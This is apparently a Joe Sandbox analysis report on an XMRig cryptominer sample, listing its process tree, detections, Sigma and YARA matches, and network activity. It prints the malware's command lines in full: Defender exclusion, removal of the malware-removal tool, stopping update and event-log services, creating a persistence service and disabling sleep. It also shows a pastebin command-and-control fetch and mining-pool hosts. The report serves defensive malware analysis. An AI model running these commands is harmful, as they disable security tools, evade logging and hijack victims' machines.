Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nlGOh9K5X5.exe

Overview

General Information

Sample name:nlGOh9K5X5.exe
renamed because original name is a hash value
Original sample name:aca4c0d0dc6f260200ea503a5ce8b370f482044253613142efcdebe5fd92a9f3.exe
Analysis ID:1570395
MD5:6369ad2a31d25fa131268f312b0c9d03
SHA1:3560bbb24d688b8356615077ff8509d3fb438e05
SHA256:aca4c0d0dc6f260200ea503a5ce8b370f482044253613142efcdebe5fd92a9f3
Tags:exeuser-Chainskilabs
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to a pastebin service (likely for C&C)
DNS related to crypt mining pools
Found strings related to Crypto-Mining
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • nlGOh9K5X5.exe (PID: 6664 cmdline: "C:\Users\user\Desktop\nlGOh9K5X5.exe" MD5: 6369AD2A31D25FA131268F312B0C9D03)
    • powershell.exe (PID: 6708 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2120 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 6328 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 3336 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5172 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6300 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5216 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6976 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6908 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6812 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6784 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 4312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2536 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5808 cmdline: C:\Windows\system32\sc.exe delete "HZIWFEGQ" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7056 cmdline: C:\Windows\system32\sc.exe create "HZIWFEGQ" binpath= "C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6832 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 984 cmdline: C:\Windows\system32\sc.exe start "HZIWFEGQ" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • mfpmikspvfzi.exe (PID: 7108 cmdline: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exe MD5: 6369AD2A31D25FA131268F312B0C9D03)
    • powershell.exe (PID: 3916 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5800 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 560 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 7152 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7056 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6860 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5652 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5004 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7032 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7104 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 3916 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6784 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 6808 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000003A.00000003.1824324601.00000000005DC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      0000003A.00000003.1786548179.00000000005B3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        0000003A.00000003.1824408272.0000000000600000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          0000003A.00000003.1824354802.000000000060B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            0000003A.00000002.4158665690.00000000005A0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              Click to see the 21 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              33.3.mfpmikspvfzi.exe.243209b0000.2.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                33.3.mfpmikspvfzi.exe.243209b0000.2.raw.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
                • 0x36fe08:$a1: mining.set_target
                • 0x362030:$a2: XMRIG_HOSTNAME
                • 0x3649a8:$a3: Usage: xmrig [OPTIONS]
                • 0x362008:$a4: XMRIG_VERSION
                33.3.mfpmikspvfzi.exe.243209b0000.2.raw.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
                • 0x3b5561:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
                33.3.mfpmikspvfzi.exe.243209b0000.2.raw.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
                • 0x3b5dd8:$s1: %s/%s (Windows NT %lu.%lu
                • 0x3b9400:$s3: \\.\WinRing0_
                • 0x366fa8:$s4: pool_wallet
                • 0x3613d8:$s5: cryptonight
                • 0x3613e8:$s5: cryptonight
                • 0x3613f8:$s5: cryptonight
                • 0x361408:$s5: cryptonight
                • 0x361420:$s5: cryptonight
                • 0x361430:$s5: cryptonight
                • 0x361440:$s5: cryptonight
                • 0x361458:$s5: cryptonight
                • 0x361468:$s5: cryptonight
                • 0x361480:$s5: cryptonight
                • 0x361498:$s5: cryptonight
                • 0x3614a8:$s5: cryptonight
                • 0x3614b8:$s5: cryptonight
                • 0x3614c8:$s5: cryptonight
                • 0x3614e0:$s5: cryptonight
                • 0x3614f8:$s5: cryptonight
                • 0x361508:$s5: cryptonight
                • 0x361518:$s5: cryptonight
                33.3.mfpmikspvfzi.exe.243209b0000.2.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                  Click to see the 3 entries

                  Sigma Signatures

                  Change of critical system settings

                  barindex
                  Sigma detected: Disable power options
                  Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\nlGOh9K5X5.exe", ParentImage: C:\Users\user\Desktop\nlGOh9K5X5.exe, ParentProcessId: 6664, ParentProcessName: nlGOh9K5X5.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 6908, ProcessName: powercfg.exe

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nlGOh9K5X5.exe", ParentImage: C:\Users\user\Desktop\nlGOh9K5X5.exe, ParentProcessId: 6664, ParentProcessName: nlGOh9K5X5.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6708, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nlGOh9K5X5.exe", ParentImage: C:\Users\user\Desktop\nlGOh9K5X5.exe, ParentProcessId: 6664, ParentProcessName: nlGOh9K5X5.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6708, ProcessName: powershell.exe
                  Sigma detected: New Service Creation Using Sc.EXE
                  Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "HZIWFEGQ" binpath= "C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "HZIWFEGQ" binpath= "C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\nlGOh9K5X5.exe", ParentImage: C:\Users\user\Desktop\nlGOh9K5X5.exe, ParentProcessId: 6664, ParentProcessName: nlGOh9K5X5.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "HZIWFEGQ" binpath= "C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exe" start= "auto", ProcessId: 7056, ProcessName: sc.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\nlGOh9K5X5.exe", ParentImage: C:\Users\user\Desktop\nlGOh9K5X5.exe, ParentProcessId: 6664, ParentProcessName: nlGOh9K5X5.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6708, ProcessName: powershell.exe

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Sigma detected: Stop EventLog
                  Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\nlGOh9K5X5.exe", ParentImage: C:\Users\user\Desktop\nlGOh9K5X5.exe, ParentProcessId: 6664, ParentProcessName: nlGOh9K5X5.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 6832, ProcessName: sc.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-06T22:46:13.687422+010020542471A Network Trojan was detected172.67.19.24443192.168.2.449731TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for dropped file
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeReversingLabs: Detection: 73%
                  Multi AV Scanner detection for submitted file
                  Source: nlGOh9K5X5.exeReversingLabs: Detection: 73%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                  Bitcoin Miner

                  barindex
                  Yara detected Xmrig cryptocurrency miner
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 33.3.mfpmikspvfzi.exe.243209b0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.3.mfpmikspvfzi.exe.243209b0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000003A.00000003.1824324601.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003A.00000003.1786548179.00000000005B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003A.00000003.1824408272.0000000000600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003A.00000003.1824354802.000000000060B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003A.00000002.4158665690.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003A.00000003.3137522381.000000000060B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003A.00000002.4158665690.00000000005DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003A.00000003.1823929141.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003A.00000002.4158665690.0000000000585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003A.00000003.1824391843.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003A.00000003.1824376543.0000000000628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003A.00000002.4158665690.00000000005E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003A.00000003.1823776260.0000000000632000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003A.00000003.2965773416.000000000060B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003A.00000003.2747475402.000000000060B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003A.00000003.2860263171.000000000060B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003A.00000003.1824439592.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003A.00000002.4158665690.0000000000549000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000003A.00000003.1823817242.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000003.1785206642.00000243209B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: mfpmikspvfzi.exe PID: 7108, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 6808, type: MEMORYSTR
                  DNS related to crypt mining pools
                  Source: unknownDNS query: name: xmr-eu1.nanopool.org
                  Found strings related to Crypto-Mining
                  Source: mfpmikspvfzi.exe, 00000021.00000003.1785206642.00000243209B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                  Source: mfpmikspvfzi.exe, 00000021.00000003.1785206642.00000243209B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
                  Source: mfpmikspvfzi.exe, 00000021.00000003.1785206642.00000243209B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                  Source: mfpmikspvfzi.exe, 00000021.00000003.1785206642.00000243209B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                  Source: mfpmikspvfzi.exe, 00000021.00000003.1785206642.00000243209B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                  Source: mfpmikspvfzi.exe, 00000021.00000003.1785206642.00000243209B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
                  Source: nlGOh9K5X5.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: mfpmikspvfzi.exe, 00000021.00000003.1782446141.0000024320770000.00000004.00000001.00020000.00000000.sdmp

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2054247 - Severity 1 - ET MALWARE SilentCryptoMiner Agent Config Inbound : 172.67.19.24:443 -> 192.168.2.4:49731
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\explorer.exeNetwork Connect: 51.15.193.130 10343Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 172.67.19.24 443Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 51.89.23.91 10343Jump to behavior
                  Connects to a pastebin service (likely for C&C)
                  Source: unknownDNS query: name: pastebin.com
                  Source: global trafficTCP traffic: 192.168.2.4:49730 -> 51.89.23.91:10343
                  Source: global trafficTCP traffic: 192.168.2.4:49732 -> 51.15.193.130:10343
                  Source: Joe Sandbox ViewIP Address: 51.15.193.130 51.15.193.130
                  Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                  Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                  Source: Joe Sandbox ViewIP Address: 51.89.23.91 51.89.23.91
                  Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
                  Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /raw/Cs3YCuXT HTTP/1.1Accept: */*Connection: closeHost: pastebin.comUser-Agent: cpp-httplib/0.12.6
                  Source: global trafficDNS traffic detected: DNS query: xmr-eu1.nanopool.org
                  Source: global trafficDNS traffic detected: DNS query: pastebin.com
                  Source: mfpmikspvfzi.exe, 00000021.00000003.1782446141.0000024320770000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                  Source: mfpmikspvfzi.exe, 00000021.00000003.1782446141.0000024320770000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
                  Source: mfpmikspvfzi.exe, 00000021.00000003.1782446141.0000024320770000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                  Source: mfpmikspvfzi.exe, 00000021.00000003.1782446141.0000024320770000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                  Source: explorer.exe, 0000003A.00000003.1824324601.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000002.4158665690.00000000005A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/Cs3YCuXT
                  Source: explorer.exe, 0000003A.00000002.4158665690.00000000005A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/Cs3YCuXTF
                  Source: mfpmikspvfzi.exe, 00000021.00000003.1785206642.00000243209B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443

                  System Summary

